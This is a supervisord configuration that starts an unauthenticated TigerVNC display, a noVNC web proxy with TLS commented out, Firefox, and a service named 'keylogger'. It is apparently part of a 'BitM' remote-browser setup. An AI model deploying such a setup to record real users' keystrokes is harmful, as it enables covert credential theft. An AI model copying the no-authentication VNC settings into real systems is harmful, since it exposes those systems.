[supervisord]
nodaemon=true
pidfile=/tmp/supervisord.pid
logfile=/dev/null
logfile_maxbytes=0
user=root
environment=HOME="/home/bitm",USER="bitm",LOGNAME="bitm",XDG_CONFIG_HOME="/home/bitm/.config",XDG_CACHE_HOME="/home/bitm/.cache"

[program:x11]
priority=1
command=/usr/bin/Xtigervnc -desktop "BitM" -rfbport 5900 -SecurityTypes none -AlwaysShared -AcceptKeyEvents -AcceptPointerEvents -AcceptSetDesktopSize -SendCutText -AcceptCutText -depth 24 -geometry 1920x1080 -dpi 96 :0
user=bitm
autorestart=true
stdout_logfile=/dev/fd/1
stdout_logfile_maxbytes=0
redirect_stderr=true

[program:novnc]
priority=3
command=/bitm/app/noVNC/utils/novnc_proxy --vnc localhost:5900 --listen NOVNC_PORT
user=bitm
#--cert /bitm/app/certs/cert.pem --key /bitm/app/certs/key.pem --ssl-only
autorestart=true
stdout_logfile=/dev/fd/1
stdout_logfile_maxbytes=0
redirect_stderr=true

[program:openbox]
priority=4
command=/usr/bin/openbox-session
user=bitm
autorestart=true
stdout_logfile=/dev/fd/1
stdout_logfile_maxbytes=0
redirect_stderr=true

[program:firefox]
priority=5
command=/bitm/app/startFirefox.sh
user=bitm
autorestart=true
stdout_logfile=/dev/fd/1
stdout_logfile_maxbytes=0
redirect_stderr=true

[program:keylogger]
priority=6
command=python3 /bitm/app/keylogger/keylogger.py
user=bitm
autorestart=true
stdout_logfile=/dev/fd/1
stdout_logfile_maxbytes=0
redirect_stderr=true
